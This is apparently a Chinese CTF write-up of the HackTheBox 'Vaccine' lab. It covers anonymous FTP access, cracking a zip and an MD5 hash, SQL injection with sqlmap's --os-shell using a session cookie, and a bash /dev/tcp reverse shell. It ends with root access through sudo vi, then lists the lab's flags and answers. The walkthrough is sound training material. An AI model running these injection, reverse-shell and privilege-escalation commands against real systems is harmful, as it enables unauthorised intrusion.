当前位置: 首页 > news >正文

HTB-Vaccine(suid提权、sqlmap、john2zip)

news 来源:原创 2024/9/20 9:07:06

前言

  • 各位师傅大家好,我是qmx_07,今天来为大家讲解Vaccine靶机
    在这里插入图片描述

渗透过程

信息搜集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 服务器开放了 21FTP服务、22SSH服务、80HTTP服务

通过匿名登录FTP服务器

在这里插入图片描述

  • 通过匿名登录到服务器,发现backup.zip文件,可能存在账号密码
    在这里插入图片描述
  • 发现backup.zip文件 设置密码,考虑使用john 破解

john 破解zip文件

在这里插入图片描述

  • zip2john 是一个用于处理加密 ZIP 文件以进行密码破解的工具
  • 可以将加密的 ZIP 文件转换为一种特定的格式,以便密码破解工具(如 John the Ripper)能够识别和处理。
  • 文件后缀为 “.hashes” 通常表示该文件包含密码哈希值
  • 通过对密码进行特定的算法运算得到的结果,其目的是为了在不直接存储明文密码的情况下,能够验证用户输入的密码是否正确
    在这里插入图片描述
    密码是:741852963

哈希破解

在这里插入图片描述

  • 可以看到 网站的账户是:admin
  • 密码经过md5加密:2cb42f8734ea607eefed3b70af13bbd3

我们介绍一下密码破解网站:crackstation.net

  • 支持多种哈希算法:LM、NTLM、MD2、MD4、MD5、SHA1、SHA224、SHA256、SHA384、SHA512、RIPEMD160 ,速度非常快
    在这里插入图片描述
  • 密码是:qwerty789

sqlmap 利用- os-shell 获取权限

在这里插入图片描述

  • 登录网站之后,发现搜索框 查询内容,疑似sql注入
    在这里插入图片描述
  • 输入’ 有错误回显,确认确实具有该漏洞
    在这里插入图片描述
  • SQLMap 是一款开源的自动化 SQL 注入工具,主要用于检测和利用 SQL 注入漏洞
  • 可以对多种数据库进行漏洞探测:MySQL、Oracle、PostgreSQL、Microsoft SQL Server
    常用命令:
-u:指定目标 URL
例子:sqlmap -u "http://example.com/page.php?id=1"
--dbs:列出目标数据库中的所有数据库
例子:sqlmap -u "http://example.com/page.php?id=1" --dbs
--tables:列出指定数据库中的所有表
例子:sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name
--columns:列出指定表中的所有列
例子:sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name
-os-shell 用于获取目标服务器的操作系统命令行 shell
例子:sqlmap -u "http://example.com/page.php?id=1" --os-shell

在这里插入图片描述

  • 通过yakit 捕获cookie内容,因为sql注入的地方 是后台,需要登录信息
  • Cookie: PHPSESSID=3mmtugeeqob4aplgtdomrie2gf
    在这里插入图片描述
sqlmap -u "http://10.129.104.85/dashboard.php?search=nothing" --cookie="PHPSESSID=3mmtugeeqob4aplgtdomrie2gf" --os-shell

在这里插入图片描述

  • 可以执行命令 来反弹会话
bash -c "bash -i >& /dev/tcp/10.10.16.3/1234 0>&1"

在这里插入图片描述
通过一下命令,来巩固会话:

python3 -c 'import pty; pty.spawn("/bin/bash")'

suid提权

在这里插入图片描述

在这里插入图片描述

  • 翻找网站连接配置文件dashboard.php

  • 用户是:postgres

  • 密码是:P@s5w0rd!
    在这里插入图片描述

  • 命令:su postgres //登录账户

  • 可以观察到 postgres可以以root权限运行 vi命令 指向pg_hba.conf

  • https://gtfobins.github.io/ 这个网站提供了suid提权的相关命令
    在这里插入图片描述

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh     :wq 保存退出
:shell                 回车

在这里插入图片描述
user_flag:ec9b13ca4d6229cd5cc1e09980965bf7

在这里插入图片描述
flag:dd6e058e814260bc70e9bbdef2715849

答案

  • 1.服务器上除了HTTP、SSH服务,还提供了哪些服务?

FTP

  • 2.可以使用哪个用户登录FTP服务器?

anonymous

  • 3.可以使用哪个命令下载文件?

get

  • 4.john the ripper可以使用哪个脚本来破解zip文件?

john2zip

  • 5.admin的密码是什么?

QWERTY789

  • 6.sqlmap可以使用什么参数来获得命令执行?

–os-shell

  • 7.postgres可以使用什么命令以root身份运行?

vi

  • 8.用户flag?

ec9b13ca4d6229cd5cc1e09980965bf7

  • 9.flag?

dd6e058e814260bc70e9bbdef2715849

总结

  • 我们介绍了john2zip脚本,sqlmap工具及常用参数,suid提权及相关辅助网站,哈希密码破解网站

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • ImDisk Toolkit将一部分RAM模拟成硬盘分区
  • 构建响应式 Web 应用:Vue.js 基础指南
  • Linux内核编程(十六)CAN总线驱动
  • Anolis OS 8.8 CentOS8离线安装mysql-8.0.9
  • Docker简介在Centos和Ubuntu环境下安装Docker
  • 医疗监测数据检测系统源码分享
  • Chrome和Chromium浏览器有什么不同?
  • 鸿蒙之Hello Word 遇坑总结 mac系统 不能预览 提示 Only files in a module can be previewed 解决办法
  • 第十一周:机器学习笔记
  • arcgisPro地理配准
  • 【鸿蒙OH-v5.0源码分析之 Linux Kernel 部分】007 - 一号内核线程 kernel_init线程 工作流程分析
  • SQL Server数据库简单的事务日志备份恢复
  • 系统 IO
  • 数据库管理-第241期 KingBaseES V9 on RHEL8(20240912)
  • Docker镜像文件、容器、卷和网络存放位置
  • $translatePartialLoader加载失败及解决方式
  • [译]Python中的类属性与实例属性的区别
  • 【技术性】Search知识
  • Centos6.8 使用rpm安装mysql5.7
  • ES10 特性的完整指南
  • Flex布局到底解决了什么问题
  • javascript 总结(常用工具类的封装)
  • JavaScript标准库系列——Math对象和Date对象(二)
  • Java方法详解
  • nginx 负载服务器优化
  • PAT A1017 优先队列
  • PHP 7 修改了什么呢 -- 2
  • SpingCloudBus整合RabbitMQ
  • SQL 难点解决:记录的引用
  • 如何使用 JavaScript 解析 URL
  • ‌分布式计算技术与复杂算法优化:‌现代数据处理的基石
  • #70结构体案例1(导师,学生,成绩)
  • (2)(2.10) LTM telemetry
  • (3)(3.2) MAVLink2数据包签名(安全)
  • (Arcgis)Python编程批量将HDF5文件转换为TIFF格式并应用地理转换和投影信息
  • (Python第六天)文件处理
  • (阿里巴巴 dubbo,有数据库,可执行 )dubbo zookeeper spring demo
  • (二)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (原創) 如何動態建立二維陣列(多維陣列)? (.NET) (C#)
  • (转)GCC在C语言中内嵌汇编 asm __volatile__
  • (转)jQuery 基础
  • (转)关于多人操作数据的处理策略
  • (转载)Linux网络编程入门
  • ***测试-HTTP方法
  • .gitignore文件_Git:.gitignore
  • .gitignore文件设置了忽略但不生效
  • .MSSQLSERVER 导入导出 命令集--堪称经典,值得借鉴!
  • .net core 的缓存方案
  • .Net Core 微服务之Consul(二)-集群搭建
  • .net core开源商城系统源码,支持可视化布局小程序
  • .NET Entity FrameWork 总结 ,在项目中用处个人感觉不大。适合初级用用,不涉及到与数据库通信。
  • .net SqlSugarHelper
  • .NET 表达式计算:Expression Evaluator
  • .NET 药厂业务系统 CPU爆高分析